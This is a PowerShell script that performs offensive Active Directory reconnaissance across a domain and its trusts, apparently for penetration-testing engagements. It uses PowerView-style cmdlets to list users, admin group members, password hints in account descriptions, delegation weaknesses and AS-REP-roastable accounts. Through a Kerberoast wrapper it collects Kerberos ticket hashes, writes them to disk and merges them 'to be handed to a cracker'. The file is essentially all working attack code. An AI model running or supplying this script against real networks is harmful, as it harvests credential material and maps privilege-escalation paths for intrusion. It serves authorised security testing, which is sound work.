# Get-ADNC.ps1 -- one-shot Active Directory recon summary for a DC and its trusts.
#
# Given the address of a domain controller, this script resolves the domain
# name over LDAP, collects the names at both ends of every trust it can map,
# and for each domain writes one text file per category under domain_<name>\
# (users, password hints in descriptions, Domain Admins / Administrators
# membership, DCs, computers, Kerberoast output, AS-REP-roastable accounts,
# unconstrained / constrained delegation, foreign group members) while
# printing a count per category. Categories that are usually directly
# exploitable are printed in red.
#
# Dependencies: the PowerView-style cmdlets used below (Get-DomainUser,
# Get-DomainTrustMapping, Get-DomainGroupMember, Get-DomainController,
# Get-DomainComputer, Get-DomainForeignGroupMember) and an Invoke-KR command
# (presumably a Kerberoast wrapper exposing a .hash property) must already be
# loaded in the session; nothing is imported here.
#
# Caveats for the operator:
#   * $ErrorActionPreference is set to 'silentlycontinue' for the whole run,
#     so a missing dependency, a failed bind or a denied query shows up as a
#     zero count and a deleted file, not as an error. A "0" is "unknown"
#     until you have confirmed connectivity and credentials.
#   * Output goes to the current directory and includes credential material
#     (Kerberoast hashes) in plaintext. Run from a controlled working
#     directory and remove the artefacts when the engagement is over.
[CmdletBinding()]
param(
# Address of the domain controller to bind to; it is interpolated verbatim
# into "LDAP://$dcip", so an IP or a resolvable host name both work.
[Parameter(Mandatory=$true)]
[String]$dcip
)
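# --- Domain discovery -------------------------------------------------------
# NOTE: every error is suppressed script-wide from here on. A PowerView call
# that fails (no module loaded, no network, no rights) produces an empty file
# and a "0" count rather than an error, so zero counts must not be read as
# "nothing there" until the environment has been sanity-checked.
$ErrorActionPreference= 'silentlycontinue'
# Derive the domain FQDN from the DC's default naming context
# (DC=corp,DC=example,DC=com -> corp.example.com).
$dn = ([ADSI]"LDAP://$dcip").distinguishedName
# A failed bind would otherwise be swallowed and the script would continue
# with an empty domain name; say so explicitly (warnings are not suppressed).
if (-not $dn) {
Write-Warning "LDAP bind to $dcip returned no distinguishedName; check the address, connectivity and credentials."
exit
}
$dom = (($dn).replace('DC=', '')).replace(',', '.')
$file = "domains.txt"
$check = "Domains: "
# Seed the domain list with the queried domain, then add both ends of every
# trust relationship. The previous version wrote $dom to the file and then
# overwrote the file with the trust map alone, so a forest with no trusts
# ended up with an empty list and exited without enumerating anything.
$domains = @($dom) + @(Get-DomainTrustMapping | Foreach { $_.SourceName,$_.TargetName })
$domains | Where-Object { $_ } | Sort-Object -Unique > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Output "`n$check $count" } else { del "$file"; exit }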
# --- Per-domain enumeration -------------------------------------------------
# Reads the literal file name rather than $file (they are equal at this point).
# The loop variable reuses $dom, so the script-level domain name set above is
# shadowed from here on.
foreach ($dom in gc .\domains.txt) {
Write-Host "`n[+] $dom"
mkdir -Force domain_$dom > $null
# Pattern used for every category below: write the result to $file, count
# the lines, print "<label> <count>", and delete the file when it is empty.
# Because errors are suppressed, a failed query is indistinguishable from an
# empty result here.
$file = "domain_$dom\users.txt"
$check = "Domain Users: "
(Get-DomainUser -Domain $dom).samaccountname > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
# Accounts whose description mentions something password-like. The regex is
# deliberately loose ("pw" also matches unrelated words), so review by hand.
$file = "domain_$dom\userdesc.txt"
$check = "Description p/w: "
Get-DomainUser -Domain $dom | where {$_.description -ne $null} | select samaccountname,description | sls "pw|p/w|passw" > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
# Recursive membership (nested groups flattened) of the two built-in admin
# groups, de-duplicated.
$file = "domain_$dom\group_DAs.txt"
$check = "Domain Admins: "
(Get-DomainGroupMember "Domain Admins" -Domain $dom -Recurse).MemberName | Sort -uniq > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host "$check $count" } else { del "$file" }
$file = "domain_$dom\group_Administrators.txt"
$check = "Administrators: "
(Get-DomainGroupMember "Administrators" -Domain $dom -Recurse).MemberName | Sort -uniq > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host "$check $count" } else { del "$file" }
# DCs.txt is reused below to strip DCs out of the unconstrained-delegation
# list; note it is deleted here when the query returns nothing.
$file = "domain_$dom\DCs.txt"
$check = "Domain Controllers:"
(Get-DomainController -Domain $dom).name > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
$file = "domain_$dom\computers.txt"
$check = "Computers: "
(Get-DomainComputer -Domain $dom).dnshostname > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
# Invoke-KR is not defined in this file; presumably a Kerberoast wrapper
# whose output objects carry a .hash property. Whatever it returns is written
# to disk in plaintext -- this is credential material, handle it as such.
$file = "domain_$dom\krb.txt"
$check = "Kerberoast Hashes: "
(Invoke-KR -Domain $dom).hash > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
# LDAP bitwise-AND matching rule (1.2.840.113556.1.4.803) on
# userAccountControl bit 4194304 (0x400000, DONT_REQ_PREAUTH). Despite the
# label, only the account names are saved here, not AS-REP hashes.
$file = "domain_$dom\asrep.txt"
$check = "ASREP hashes: "
(Get-DomainUser -Domain $dom -Filter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)").samaccountname > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
# Hosts trusted for unconstrained delegation, minus the DCs (which always
# are). NOTE(review): if DCs.txt was deleted above, or no hosts were found,
# Compare-Object receives $null and the error is swallowed -- the file is
# then left as written by the first line, DCs included. Confirm before
# relying on the count.
$file = "domain_$dom\unconstrained.txt"
$check = "Unconstrained Del: "
(Get-DomainComputer -Domain $dom -unconstrained).dnshostname > $file
(Compare-Object (gc $file) (gc "domain_$dom\DCs.txt") | ?{$_.SideIndicator -eq '<='}).InputObject | sc $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
# Constrained delegation. This scrapes the formatted table text through
# Select-String/ConvertTo-Csv and a temp file "_tmp" in the working
# directory; it depends on Format-Table's rendering and on the
# msds-allowedtodelegateto values being shown as "{...}", so it is fragile
# and the count should be checked against the file.
$file = "domain_$dom\constrained.txt"
$check = "Constrained Del: "
$constrained = Get-DomainUser -Domain $dom -TrustedToAuth | select name,"msds-allowedtodelegateto" | ft -HideTableHeaders
$constrained | Out-String | sls '{' | ConvertTo-Csv -NoTypeInformation > $file
gc $file | sls '{*}' > _tmp
gc _tmp | where {$_ -ne ""} > $file
del _tmp
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
# Members of this domain's groups that come from another domain. The CSV is
# written with its header row and the quotes stripped, hence the -1 below.
$file = "domain_$dom\domainhoppers.txt"
$check = "Domain Hoppers: "
$hoppers = Get-DomainForeignGroupMember -Domain $dom | ConvertTo-Csv -NoTypeInformation
if ( $hoppers ) { ($hoppers).replace('"','') > $file }
$count = (gc $file).count -1 # removes header count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check 0"; del "$file" }
}
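# --- Cross-domain roll-up ---------------------------------------------------
# When more than one domain_<name> directory was produced above, concatenate
# the findings most worth acting on (Kerberoast output, AS-REP-roastable
# accounts, password-hinting descriptions) under domain_ALL\ so they can be
# handed to a cracker in one go.
echo ""
echo ""
$path = "domain_ALL"
# A domain_ALL left over from an earlier run matches domain_* too; exclude it
# so a single-domain run does not trigger the roll-up.
$perDomain = @(dir domain_* | Where-Object { $_.Name -ne $path })
if ($perDomain.count -gt 1) {
Write-Host "Combining domain data under ${path}:"
if (Test-Path -Path $path) { del $path -Force -Recurse }
mkdir -Force $path > $null
# Same (file, label) pairs as the per-domain loop. The merged krb.txt and
# asrep.txt are credential material in plaintext; treat the directory
# accordingly and remove it when no longer needed.
$merge = @(
@{ File = "krb.txt";      Check = "Kerberoast Hashes: " },
@{ File = "asrep.txt";    Check = "ASREP hashes: " },
@{ File = "userdesc.txt"; Check = "Description p/w: " }
)
foreach ($m in $merge) {
$file = $m.File
$check = $m.Check
# domain_ALL was just recreated empty, so only per-domain copies match here.
$parts = @(dir "domain_*\$file")
if ($parts.count -gt 0) { gc ($parts | ForEach-Object { $_.FullName }) > "$path\$file" }
$count = (gc "$path\$file").count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$path\$file" }
}
}
echo ""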